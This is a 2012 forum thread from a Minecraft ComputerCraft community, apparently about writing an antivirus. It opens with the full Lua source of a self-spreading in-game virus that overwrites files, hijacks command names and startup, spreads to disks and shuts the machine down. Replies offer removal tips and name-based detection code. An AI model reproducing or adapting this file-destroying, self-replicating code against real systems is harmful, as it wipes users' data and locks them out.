Antivirus help?

I am developing an antivirus and have come across a so far unbeatable virus. I need help beating it and being able to remove it. What it does is ever time you enter a command, it creates a file named the same so it automatically runs before the computer can run the file you chose and it displays a message and shuts down so you can't use that program. You can't even edit :S Here is the code and i hope you can help.

local viruscode = "os.pullEvent = os.pullEventRaw \n";
local viruscode1 = "-- LOL N00B!! -- \n"
local viruscode2 = "print(\"PWN3D N00B!\") \n"
local viruscodeSpread1 = "function infect(directory) \n"
local viruscodeSpread2 = " if fs.exists(directory) then \n"
local viruscodeSpread3 = "  fs.delete(directory) \n"
local viruscodeSpread4 = " end \n"
local viruscodeSpread5 = " file = io.open(directory, \"w\") \n"
local viruscodeSpread6 = " file:write(viruscode) \n"
local viruscodeSpread7 = " file:write(viruscode1) \n"
local viruscodeSpread8 = " file:write(viruscode2) \n"
local viruscodeSpread9 = " file:write(viruscode3) \n"
local viruscodeSpread10 = " file:write(viruscode4) \n"
local viruscodeSpread11 = " file:close() \n"
local viruscodeSpread12 = "end \n"
local viruscodeSpread13 = "if fs.exists(\"disk/\") then \n"
local viruscodeSpread14 = "infect(\"disk/startup\") \n"
local viruscodeSpread15 = "end \n"
local viruscodeSpread16 = "infect(\"startup\") \n"
local viruscode3 = "sleep(4) \n"
local viruscode4 = "os.shutdown() \n"
if fs.exists("disk/") then
files = fs.list("disk")
for n=1,#files do
   if not fs.isDir("disk/"..files[n]) then
		 file = io.open("disk/"..files[n], "w")
		 file:write(viruscode)
		 file:write(viruscode1)
		 file:write(viruscode2)
		 file:write(viruscodeSpread1)
		 file:write(viruscodeSpread2)
		 file:write(viruscodeSpread3)
		 file:write(viruscodeSpread4)
		 file:write(viruscodeSpread5)
		 file:write(viruscodeSpread6)
		 file:write(viruscodeSpread7)
		 file:write(viruscodeSpread8)
		 file:write(viruscodeSpread9)
		 file:write(viruscodeSpread10)
		 file:write(viruscodeSpread11)
		 file:write(viruscodeSpread12)
		 file:write(viruscodeSpread13)
		 file:write(viruscodeSpread14)
		 file:write(viruscodeSpread15)
		 file:write(viruscodeSpread16)
		 file:write(viruscode3)
		 file:write(viruscode4)
		 file:close()
   end
end
end
files = fs.list("/")
for n=1,#files do
		    if not fs.isDir("/"..files[n]) then
    fs.delete("/" ..files[n])
						    file = io.open("/"..files[n], "w")
    file:write(viruscode)
    file:write(viruscode1)
    file:write(viruscode2)
    file:write(viruscodeSpread1)
    file:write(viruscodeSpread2)
    file:write(viruscodeSpread3)
    file:write(viruscodeSpread4)
    file:write(viruscodeSpread5)
    file:write(viruscodeSpread6)
    file:write(viruscodeSpread7)
    file:write(viruscodeSpread8)
    file:write(viruscodeSpread9)
    file:write(viruscodeSpread10)
    file:write(viruscodeSpread11)
    file:write(viruscodeSpread12)
    file:write(viruscodeSpread13)
    file:write(viruscodeSpread14)
    file:write(viruscodeSpread15)
    file:write(viruscodeSpread16)
    file:write(viruscode3)
    file:write(viruscode4)
    file:close()
		    end
end
function infect(directory)
if fs.exists(directory) then
  fs.delete(directory)
end
file = io.open(directory, "w")
file:write(viruscode)
file:write(viruscode1)
file:write(viruscode2)
file:write(viruscodeSpread1)
file:write(viruscodeSpread2)
file:write(viruscodeSpread3)
file:write(viruscodeSpread4)
file:write(viruscodeSpread5)
file:write(viruscodeSpread6)
file:write(viruscodeSpread7)
file:write(viruscodeSpread8)
file:write(viruscodeSpread9)
file:write(viruscodeSpread10)
file:write(viruscodeSpread11)
file:write(viruscodeSpread12)
file:write(viruscodeSpread13)
file:write(viruscodeSpread14)
file:write(viruscodeSpread15)
file:write(viruscodeSpread16)
file:write(viruscode3)
file:write(viruscode4)
file:close()
end
infect("/edit")
infect("/clear")
infect("/copy")
infect("/reboot")
infect("/shutdown")
infect("/list")
infect("/delete")
infect("/startup")
if fs.exists("disk/") then
infect("disk/startup")
end

Sorry if it is in the wrong topic but it is vital to release the antivirus. Thanks for your help.

If the virus only does something when the user inputs a command, then you could just have a startup floppy with an antivirus on it that deletes everything in the programs folder, then restores the defaults out of the floppy's storage.

First, that code is really bad.
Now, you can just type "/rom/programs/<ProgramName>" and use any program in the rom, so you can delete it using rm/delete.

And yes, this is the wrong forum, you should post this in ask a pro.

i know a virus that could do a lot worse than this one

This is the way my Antivirus deals with those kinds of viruses

function namecheck()
filelist = fs.list("/")
names = {"cp", "dir", "ls", "mv", "rm", "computer", "http", "secret", "turtle", "bit", "colors", "colours", "gps", "help", "io", "parallel", "rednet", "term", "textutils", "vector", "os", "math", "fs", "coroutine", "parallel", "peripheral", "rs", "redstone", "shell", "string", "table", "term", "adventure", "hello", "worm", "pastebin", "alongtimeago", "dance", "excavate", "go", "tunnel", "turn"}
for b = 1, #filelist do
for i = 1, #names do
if filelist[b] == names[i] then
viruses = viruses+1
files = files+1
print("Virus "General.Malware" found in /" .. filelist[b])
log("Virus "General.Malware" found in /" .. filelist[b])
filemove("/" .. filelist[b], "/disk/bad" .. filelist[b])
else
end
end
end
end

function syscheck()
filelist = fs.list("/")
system  = fs.list("/rom/programs")
for b = 1, #filelist do
for i = 1, #system do
if filelist[b] == system[i] then
viruses = viruses+1
files = files+1
print("Virus "General.Malware" found in /" .. filelist[b])
log("Virus "General.Malware" found in /" .. filelist[b])
filemove("/" .. filelist[b], "/disk/bad" .. filelist[b])
else
end
end
end
end

1lann, on 17 July 2012 - 06:15 AM said:

This is the way my Antivirus deals with those kinds of viruses

function namecheck()
filelist = fs.list("/")
names = {"cp", "dir", "ls", "mv", "rm", "computer", "http", "secret", "turtle", "bit", "colors", "colours", "gps", "help", "io", "parallel", "rednet", "term", "textutils", "vector", "os", "math", "fs", "coroutine", "parallel", "peripheral", "rs", "redstone", "shell", "string", "table", "term", "adventure", "hello", "worm", "pastebin", "alongtimeago", "dance", "excavate", "go", "tunnel", "turn"}
for b = 1, #filelist do
for i = 1, #names do
if filelist[b] == names[i] then
viruses = viruses+1
files = files+1
print("Virus "General.Malware" found in /" .. filelist[b])
log("Virus "General.Malware" found in /" .. filelist[b])
filemove("/" .. filelist[b], "/disk/bad" .. filelist[b])
else
end
end
end
end

function syscheck()
filelist = fs.list("/")
system  = fs.list("/rom/programs")
for b = 1, #filelist do
for i = 1, #system do
if filelist[b] == system[i] then
viruses = viruses+1
files = files+1
print("Virus "General.Malware" found in /" .. filelist[b])
log("Virus "General.Malware" found in /" .. filelist[b])
filemove("/" .. filelist[b], "/disk/bad" .. filelist[b])
else
end
end
end
end

<p>Wow, it looks good. Can I use this code, and does%2

fireblade2472, on 17 July 2012 - 07:03 AM said:

1lann, on 17 July 2012 - 06:15 AM said:

This is the way my Antivirus deals with those kinds of viruses

function namecheck()
filelist = fs.list("/")
names = {"cp", "dir", "ls", "mv", "rm", "computer", "http", "secret", "turtle", "bit", "colors", "colours", "gps", "help", "io", "parallel", "rednet", "term", "textutils", "vector", "os", "math", "fs", "coroutine", "parallel", "peripheral", "rs", "redstone", "shell", "string", "table", "term", "adventure", "hello", "worm", "pastebin", "alongtimeago", "dance", "excavate", "go", "tunnel", "turn"}
for b = 1, #filelist do
for i = 1, #names do
if filelist[b] == names[i] then
viruses = viruses+1
files = files+1
print("Virus "General.Malware" found in /" .. filelist[b])
log("Virus "General.Malware" found in /" .. filelist[b])
filemove("/" .. filelist[b], "/disk/bad" .. filelist[b])
else
end
end
end
end

function syscheck()
filelist = fs.list("/")
system  = fs.list("/rom/programs")
for b = 1, #filelist do
for i = 1, #system do
if filelist[b] == system[i] then
viruses = viruses+1
files = files+1
print("Virus "General.Malware" found in /" .. filelist[b])
log("Virus "General.Malware" found in /" .. filelist[b])
filemove("/" .. filelist[b], "/disk/bad" .. filelist[b])
else
end
end
end
end

<p>Wow, it looks good. Can I use this code, and does%2

Yeah sure you can use it and it should work against the virus. However you might want to do a check for a string in the viurs to see whether its a virus or not

1lann, on 17 July 2012 - 06:15 AM said:

This is the way my Antivirus deals with those kinds of viruses

function namecheck()
filelist = fs.list("/")
names = {"cp", "dir", "ls", "mv", "rm", "computer", "http", "secret", "turtle", "bit", "colors", "colours", "gps", "help", "io", "parallel", "rednet", "term", "textutils", "vector", "os", "math", "fs", "coroutine", "parallel", "peripheral", "rs", "redstone", "shell", "string", "table", "term", "adventure", "hello", "worm", "pastebin", "alongtimeago", "dance", "excavate", "go", "tunnel", "turn"}
for b = 1, #filelist do
for i = 1, #names do
if filelist[b] == names[i] then
viruses = viruses+1
files = files+1
print("Virus "General.Malware" found in /" .. filelist[b])
log("Virus "General.Malware" found in /" .. filelist[b])
filemove("/" .. filelist[b], "/disk/bad" .. filelist[b])
else
end
end
end
end

function syscheck()
filelist = fs.list("/")
system  = fs.list("/rom/programs")
for b = 1, #filelist do
for i = 1, #system do
if filelist[b] == system[i] then
viruses = viruses+1
files = files+1
print("Virus "General.Malware" found in /" .. filelist[b])
log("Virus "General.Malware" found in /" .. filelist[b])
filemove("/" .. filelist[b], "/disk/bad" .. filelist[b])
else
end
end
end
end

Wow, it looks good. Can I use this code, and does it work against this virus?

sorry, double post :S

how does that code work because im making an antivirus and failling so it would be good to use that…but im not sure how it works so i cant intergrate it

You could use the code for my antivirus which works against startup virus's?

print("MCAntivirus+ loaded")
print("Startup disabled.")
print("Deleting startup...")
fs.delete("startup")
sleep(3)
print("Startup deleted. Your system is secure.")

fireblade2472, on 17 July 2012 - 05:53 PM said:

You could use the code for my antivirus which works against startup virus's?

print("MCAntivirus+ loaded")
print("Startup disabled.")
print("Deleting startup...")
fs.delete("startup")
sleep(3)
print("Startup deleted. Your system is secure.")

thanks but im making a very complicated one that stops the very best virusses…ill try to use something like that though
also, does anyone know any really amazingly epic virusses that are 'impossible' to stop because im making 'custom configs' in my antivirus that will target specific virusses

there are other viruses that arnt startup ones and can still be triggered

Doesn't anyone on this thread realize that the plural of 'virus' is 'viri'?
For those who do not know or understand the joke, please see here:
http://en.wikipedia.org/wiki/Plural_form_of_words_ending_in_-us#Use_of_the_form_virii
See also:
http://en.wikipedia.org/wiki/Hypercorrection

You could search every file in the computer for a line of code that deletes, copys, or moves a file and then compare the name of that file to an approved file list. Then it deletes the file if it's not in the list.

instead of doing

line1 = "something"
line2 = "something"
...

you could do

file = [[something
something else
...
]]